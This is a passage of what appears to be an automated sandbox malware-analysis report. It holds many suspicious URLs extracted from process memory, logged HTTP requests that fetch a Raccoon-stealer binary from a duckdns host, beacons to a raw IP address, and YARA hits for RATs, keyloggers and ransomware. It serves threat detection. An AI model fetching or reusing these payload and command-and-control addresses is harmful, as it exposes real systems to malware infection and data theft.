Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: https://ramblerimport.com/hz4uhlut5au/yu.html
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: https://rapid.cerner.com:8243/clientapi/v1.0/clients/mnemonic/
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/
Source: MpSigStub.exe, 0000000B.00000003.18275538227.0000021B5E924000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/aybiota/mpbh33775/gh-pages/g9wl5dp.ttf
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/elevenpaths/ibombshell/
Source: MpSigStub.exe, 0000000B.00000003.18275295752.0000021B5E8EE000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/empireproject/
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/powershellmafia/powersploit/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/wmitoapi/test/master/compiler.zip
Source: MpSigStub.exe, 0000000B.00000003.18263377234.0000021B5F335000.00000004.00000001.sdmp String found in binary or memory: https://rawcdn.githack.net/up.php?key=5
Source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp String found in binary or memory: https://rb.gy/kc5b5e?#ncota
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: https://rcimshop.com/wp-config-server.php
Source: MpSigStub.exe, 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp String found in binary or memory: https://realmjoin-backend-staging.azurewebsites.net/api/system/check
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://referralpays.com/aki2root/uzie/actions.php
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: https://register.hiramhousecamp.org/miouadthen/po1820.zip
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: https://relaja.me/qw5hlk1vcmvqb25azglzywdydxbvlmvz
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: https://remote.bittorrent.com
Source: MpSigStub.exe, 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp String found in binary or memory: https://rezultmedia.com/css/reportdhlnew.php
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp String found in binary or memory: https://rezultmedia.com/vendor/laravel/tinker/src/reportexcelnew.php
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: https://ringco.com.co/cache/
Source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp String found in binary or memory: https://rootca.allianz.com/aapplet
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://rotf.lol/3u6d9443
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: https://rw.mousewinning.club/?
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/119/10080008.xml
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/119/10080009.xml
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/900/10010045.xml
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/appPrefId/affPrefId.xml
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: https://s1.ax1x.com/2020/04/28/J4Zp9S.png
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: https://s15events.azure-automation.net/webhooks?token=
Source: MpSigStub.exe, 0000000B.00000003.18275538227.0000021B5E924000.00000004.00000001.sdmp String found in binary or memory: https://s18.picofile.com/d/8435906618/a27ddc7a-8599-479b-9e19-f2fd4b1988c3/setup.exe
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://s3-eu-west-1.amazonaws.com/adkooo/
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: https://s3.amazonaws.com/exec459/exec.tgz
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://s3.us-east-2.amazonaws.com/cotazion.pago/recibo.html
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: https://salebooks.xyz/app/app.exe
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: https://scabraldealdun.com/hghgh/aridonorigin.exe
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: https://scalet.publicvm.com/large2/next.php
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://sddfdfdf.typeform.com/to/vrfwamwx
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: https://secure.hotbar.com/
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18304834904.0000021B5E504000.00000004.00000001.sdmp String found in binary or memory: https://secure.logmeinrescue.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: https://secure.tibia.com/account/?subtopic=accountmanagement
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: https://securezalink.com/home.jpg/security.ocx
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: https://semalt.com/popups/popup_wow.php?lang=en
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: https://seyedishop.ir/rh1/pmt.php
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp String found in binary or memory: https://shaastraarth.in/bbbg/
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: https://shatha.n-idea.us/moo/
Source: MpSigStub.exe, 0000000B.00000003.18275538227.0000021B5E924000.00000004.00000001.sdmp String found in binary or memory: https://shop.asopalav.com/ds/0302.gif
Source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp String found in binary or memory: https://shoplady.xyz/glsdil.php
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: https://shoptimes.ro/admin/clienti/opo.php
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://shreyainfosoft.com/krishnasteelcorporation/next.php
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://shreyainfosoft.com/shayonajwellers/after.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: https://signin.ebay
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://skripon.com/oozoo/document.php
Source: MpSigStub.exe, 0000000B.00000003.18283976563.0000021B5F1A8000.00000004.00000001.sdmp String found in binary or memory: https://smartcheckautos%.com/wp%-content/%.%.%./%.%.%./x3%.php
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://smpn1kunjangkediri.sch.id/wp-content/uploads/upgrabe/
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://soft-gps.com/wp-content/plugins/cvuohucwkp/tre/swt.php
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: https://sotheraho.com/wp-content/fonts/reportexcelnew.php
Source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp String found in binary or memory: https://southpolefaxnet.ml/number/brand.php
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://southvomes.sozouths.xyz/?e=
Source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp String found in binary or memory: https://specs2go.shawalzahid.com/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://ssl-proxy.my-addr.org/myaddrproxy.php/http://
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: https://ssmdevelopers.in/4raxigaptfpm/yu.html
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: https://staging2.lifebiotic.com/novacms/grassandrocks.php
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://staralevator.com/anygas/
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://staralevator.com/anygas/nxt.php
Source: MpSigStub.exe, 0000000B.00000003.18275538227.0000021B5E924000.00000004.00000001.sdmp String found in binary or memory: https://statsdev.com/header.jpg
Source: MpSigStub.exe, 0000000B.00000003.18275538227.0000021B5E924000.00000004.00000001.sdmp String found in binary or memory: https://statseast.com/login.jpg
Source: MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: https://statsmag.com/apple/log.php
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: https://statsper.com/footer.jpg
Source: MpSigStub.exe, 0000000B.00000003.18275538227.0000021B5E924000.00000004.00000001.sdmp String found in binary or memory: https://statssale.com/header.jpg
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://stepup.pt/sugar6/ww/s.dot
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/
Source: MpSigStub.exe, 0000000B.00000003.18277934839.0000021B5E8A0000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/msofficeupdater/MSUpdater.exe
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: https://storyofusstudios.com/n75oh9tzoyhz/lipa.html
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://stretchbuilder.com/chalkzone/next.php
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: https://studio.joellemagazine.com/drms/ind.html
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: https://subahj.linkpc.net/sarah2/next.php
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: https://submit-form.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: https://suggestor.pirrit.com/engine/getpopups.php
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: https://sumnermail.org/sumnerscools/school.php
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: https://sundersls.weebly.com
Source: 1gPmnCR2PX.exe String found in binary or memory: https://support.google.com/chrome/?p=plugin_fl
Source: 1gPmnCR2PX.exe String found in binary or memory: https://support.google.com/chrome/?p=plugin_fla
Source: 1gPmnCR2PX.exe String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: https://sviescfze.com/iaret52086yla/next.php
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://sviescfze.com/ns735tey89dgwmo/next.php
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: https://sweetsizing.com/vip/
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp String found in binary or memory: https://t.me/IamLev1
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp String found in binary or memory: https://t.me/IamLev1x
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://tales.pt/webmail-purchase/reportexcel.php
Source: MpSigStub.exe, 0000000B.00000003.18299651733.0000021B5E105000.00000004.00000001.sdmp String found in binary or memory: https://tapro-trgovina.com/slimneweurope/next.php
Source: MpSigStub.exe, 0000000B.00000003.18263377234.0000021B5F335000.00000004.00000001.sdmp String found in binary or memory: https://tapro-trgovina.com/yalladg/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: https://techportal.cerner.com/api/validateProjectNumber?projectNumber=
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: https://tecnicopconline.com/wp-admin/jekbvhub.php
Source: MpSigStub.exe, 0000000B.00000003.18320594233.0000021B5E399000.00000004.00000001.sdmp String found in binary or memory: https://tegavu.com
Source: MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: https://testweb.public360saas.se:443/biz/v2-pbr/docprod/templates/bot_tjansteskrivelse.docx
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://thersshy.dynssl.com//
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://thersshy.dynssl.com//post.php
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: https://thewatch-tv.com/guyofficeaprof/post.php
Source: MpSigStub.exe, 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp String found in binary or memory: https://thiscannotpossiblywork.local/
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/bptvnhw6
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: https://tomamate.si/
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: https://toulousa.com/omg/rockspa.php
Source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp String found in binary or memory: https://towingnow.ca/LvR2HWHdQ.php
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: https://tph786.com/gym/assets/css/
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: https://tr.im/1azmq)
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: https://track.fourtiz.com
Source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp String found in binary or memory: https://tradingdashboards.com/
Source: MpSigStub.exe, 0000000B.00000003.18312990479.0000021B5F514000.00000004.00000001.sdmp String found in binary or memory: https://trafffi.ru/123?utm_term=
Source: MpSigStub.exe, 0000000B.00000003.18312990479.0000021B5F514000.00000004.00000001.sdmp String found in binary or memory: https://trafffi.ru/aws?utm_term=
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: https://trafffi.ru/shook?utm_term=
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: https://trafffi.ru/strik?utm_term=
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: https://traffking.ru/123?utm_term=
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: https://traffking.ru/aws?utm_term=
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: https://traffking.ru/shook?utm_term=
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: https://traffking.ru/strik?utm_term=
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: https://transfer.sh/
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: https://trex-miner.com
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://ttraff.cc/
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://ttraff.club/
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://ttraff.com/
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://ttraff.link/
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://ttraff.me/
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://ttraff.ru/
Source: MpSigStub.exe, 0000000B.00000003.18312990479.0000021B5F514000.00000004.00000001.sdmp String found in binary or memory: https://tweetperks.com/lbim8w/
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: https://u.nu/920yx
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: https://u.nu/e6b2i
Source: unknown DNS traffic detected: queries for: sopage.duckdns.org
Source: global traffic HTTP traffic detected: GET /Solex-RacoonStealer_JCgunCl163.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: sopage.duckdns.orgCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /teneleven11pro HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: telemirror.top
Source: global traffic HTTP traffic detected: GET //l/f/7pUkcnwB3dP17Spz8PbZ/5bb145f546aab946dfee3a86c4ed4aae2eb77748 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 5.181.156.229
Source: global traffic HTTP traffic detected: GET //l/f/7pUkcnwB3dP17Spz8PbZ/32442f5e2baf805844c1826e7816dd9d68ef3ddc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 5.181.156.229
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 12 Oct 2021 01:36:40 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytes
Source: unknown TCP traffic detected without corresponding DNS query: 5.181.156.229
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.com/www.google.com/] equals www.yahoo.com (Yahoo)
Source: 1gPmnCR2PX.exe String found in binary or memory: .www.linkedin.comTRUE/TRUE1692398980bscookie equals www.linkedin.com (Linkedin)
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: 4src='http://www.facebook.com/plugins/like.php?href equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: 4src='http://www.facebook.com/widgets/like.php?href equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: :127.0.0.1 www.login.yahoo.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: <127.0.0.1 www.search.yahoo.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: @FB_www.facebook.com/modz.ryan_ProtectedBy_RyanBorland_0x equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: @FB_www.facebook.com/modz.ryan_ProtectedBy_RyanBorland_0xx equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp String found in binary or memory: Hping -t -w 1 -l 65500 www.yahoo.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: YouTube http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: dc:\arquivos de programas\internet explorer\iexplore.exe http://www.youtube.com/watch?v=Vjp7vgj119s equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/s?wd=http://www.google.cn/search?hl=zh-CN&q=http://search.cn.yahoo.com/search?p=http://www.sogou.com/web?sogouhome=&shuru=shou&query=http://so.163.com/search.php?q= equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp String found in binary or memory: http://www.rambler.ru/srch?set= equals www.rambler.ru (Rambler)
Source: MpSigStub.exe, 0000000B.00000003.18316500668.0000021B5EA6E000.00000004.00000001.sdmp String found in binary or memory: http://www.youtube.com/watch?v= equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: src='http://www.facebook.com/plugins/like.php?href equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: src='http://www.facebook.com/widgets/like.php?href equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.com/ equals www.yahoo.com (Yahoo)
Source: unknown HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 5.181.156.229

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Keylogger Generic
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Creates a DirectInput object (often for capturing keystrokes)
Source: MpSigStub.exe, 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp Binary or memory string: DirectDrawCreateEx
Installs a raw input device (often for capturing keystrokes)
Source: MpSigStub.exe, 0000000B.00000003.18266135814.0000021B5EBFB000.00000004.00000001.sdmp Binary or memory string: GetRawInputData

E-Banking Fraud:

Yara detected Njrat
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.18271295741.0000021B5FAF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Predator
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected RevengeRAT
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands:

Yara detected BlackMoon Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Ragnarok ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Wannacry ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected MegaCortex Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Babuk Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Nemty Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Snatch Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected AESCRYPT Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected RansomwareGeneric
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Gocoder ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected WannaRen ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Yara detected Conti ransomware
Source: Yara match File source: 11.3.MpSigStub.exe.21b5ef9a849.112.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5ef9be4d.110.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5ef99445.153.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5ef9a849.152.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5ef9be4d.151.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5ef99445.124.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5ef99445.111.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5ef9be4d.125.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5ef9a849.126.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18311116875.0000021B5EDCA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18295010840.0000021B5EF98000.00000004.00000001.sdmp, type: MEMORY
